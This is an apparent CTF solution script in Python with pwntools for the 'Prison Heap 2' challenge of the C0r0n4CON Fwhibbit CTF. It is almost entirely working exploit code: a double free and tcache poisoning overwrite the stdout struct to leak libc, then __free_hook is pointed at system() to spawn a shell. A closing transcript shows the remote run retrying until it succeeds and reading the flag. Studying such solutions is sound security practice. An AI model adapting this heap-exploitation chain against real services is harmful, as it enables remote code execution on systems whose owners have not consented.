Prison Heap 2 - C0r0n4CON Fwhibbit CTF
#!/usr/bin/env python3
# coding: utf-8
from pwn import *
# pwntools session setup: any debugger/tube window is opened in a horizontal
# tmux split. Uncomment the log level line for a verbose trace of the tube.
context.terminal = ["tmux", "sp", "-h"]
# context.log_level = "DEBUG"

# Endpoint of the CTF service used in the transcript at the bottom of the
# file; set LOCAL to run the binary from the working directory instead.
HOST, PORT = "104.248.128.57", 13337
LOCAL = False

# Target binary and the local libc the offsets below were taken from.
elf = ELF("./prison_heap_hard")
libc = ELF("/lib/x86_64-linux-gnu/libc.so.6", checksec=False)
def write_prison(size, data, corrupted=False):
    """Drive menu option 1: request a slot of ``size`` bytes and send ``data`` into it.

    Uses the module-level tube ``io``. With ``corrupted`` set, the prompt is
    matched without its trailing newline and a short pause precedes the send;
    the author uses this only after the stdout struct has been overwritten,
    presumably because the menu text is no longer delivered in full — confirm.
    """
    io.recvuntil("3. Exit")
    io.sendline("1")
    io.recvuntil("heap")
    io.sendline(str(size))
    # The two modes differ only in the prompt marker and the pause before sending.
    prompt = "enter the prison" if corrupted else "enter the prison\n"
    io.recvuntil(prompt)
    if corrupted:
        sleep(0.5)
    io.sendline(data)
def free_prison(idx):
    """Drive menu option 2: free the slot at index ``idx`` (uses the module-level tube ``io``)."""
    # Each step is "wait for this marker, then answer with this line".
    steps = (("3. Exit", "2"), ("free", str(idx)))
    for marker, reply in steps:
        io.recvuntil(marker)
        io.sendline(reply)
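# Stage 1: obtain a libc address leak. Every attempt uses a fresh connection
# and is repeated until the allocation in the try block lands on the stdout
# struct (the "HIT" branch); the author's comment on slot 5 ("Good luck")
# marks the step that appears to be the probabilistic part. Any other outcome
# closes the connection and starts over.
while True:
    if LOCAL:
        io = process(elf.path)
    else:
        io = remote(HOST, PORT)

    write_prison(0x10, "")  # 0
    write_prison(0x100, "")  # 1
    write_prison(0x100, "/bin/sh\x00")  # 2 (Barrier)
    for _ in range(8):
        free_prison(1)
    free_prison(0)
    free_prison(0)
    write_prison(0x10, p8(0x80))  # 3 (Overwrite fd pointer)
    write_prison(0x10, "")  # 4
    write_prison(0x10, p16(0x8760))  # 5 (Good luck)
    write_prison(0x100, "")  # 6

    try:
        write_prison(0x100, p64(0xfbad1800) + p64(0x0) * 3 + b"\x00")  # 7
        # recvn() waits for exactly 8 bytes; recv(8) may return a short read,
        # which would make the comparison fail spuriously and u64() raise.
        pre_leak = io.recvn(8)
        if pre_leak == b"\x00" * 8:
            log.success("HIT! Stdout struct overwritten.")
            leak = u64(io.recvn(8))
            log.success("Leaked GLIBC address: " + hex(leak))
            break
        log.failure("FAIL! Retrying...")
    except EOFError:
        # The service dropped the connection mid-attempt; treat it as a miss.
        log.failure("FAIL! Retrying...")
    io.close()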
# Stage 2: rebase libc from the leak, then point __free_hook at system() and
# trigger it by freeing slot 2, which holds "/bin/sh\x00" from stage 1.
libc.address = leak - 0x3ed8b0
base_msg = "GLIBC base address: " + hex(libc.address)
log.info(base_msg)
system_msg = "System@@GLIBC address: " + hex(libc.symbols["system"])
log.info(system_msg)

# All writes from here on use the corrupted-prompt mode of write_prison().
write_prison(0x30, "", corrupted=True)  # 8
free_prison(8)
free_prison(8)  # the same slot is freed twice
write_prison(0x30, p64(libc.symbols["__free_hook"]), corrupted=True)
write_prison(0x30, "", corrupted=True)
write_prison(0x30, p64(libc.symbols["system"]), corrupted=True)
free_prison(2)  # the hook fires on this free
io.interactive()
io.close()
# Transcript of a successful run against the remote service, kept as a bare
# (unassigned) string literal so it has no effect when the script executes.
'''
[*] '/home/kaorz/Desktop/CTFs/coronafw/heap2/prison_heap_hard'
Arch: amd64-64-little
RELRO: Full RELRO
Stack: Canary found
NX: NX enabled
PIE: PIE enabled
[+] Opening connection to 104.248.128.57 on port 13337: Done
[-] FAIL! Retrying...
[*] Closed connection to 104.248.128.57 port 13337
[+] Opening connection to 104.248.128.57 on port 13337: Done
[-] FAIL! Retrying...
[*] Closed connection to 104.248.128.57 port 13337
[+] Opening connection to 104.248.128.57 on port 13337: Done
[-] FAIL! Retrying...
[*] Closed connection to 104.248.128.57 port 13337
[+] Opening connection to 104.248.128.57 on port 13337: Done
[-] FAIL! Retrying...
[*] Closed connection to 104.248.128.57 port 13337
[+] Opening connection to 104.248.128.57 on port 13337: Done
[-] FAIL! Retrying...
[*] Closed connection to 104.248.128.57 port 13337
[+] Opening connection to 104.248.128.57 on port 13337: Done
[-] FAIL! Retrying...
[*] Closed connection to 104.248.128.57 port 13337
[+] Opening connection to 104.248.128.57 on port 13337: Done
[-] FAIL! Retrying...
[*] Closed connection to 104.248.128.57 port 13337
[+] Opening connection to 104.248.128.57 on port 13337: Done
[-] FAIL! Retrying...
[*] Closed connection to 104.248.128.57 port 13337
[+] Opening connection to 104.248.128.57 on port 13337: Done
[-] FAIL! Retrying...
[*] Closed connection to 104.248.128.57 port 13337
[+] Opening connection to 104.248.128.57 on port 13337: Done
[-] FAIL! Retrying...
[*] Closed connection to 104.248.128.57 port 13337
[+] Opening connection to 104.248.128.57 on port 13337: Done
[+] HIT! Stdout struct overwritten.
[+] Leaked GLIBC address: 0x7f58d6c498b0
[*] GLIBC base address: 0x7f58d685c000
[*] System@@GLIBC address: 0x7f58d68ab440
[*] Switching to interactive mode
$ cat /home/prison/prison_heap_hard/flag.txt
flag{h34p_Pr1s0n_1s_n3C3ss4rY_To_h4ck_Th3_Pl4n3t}
'''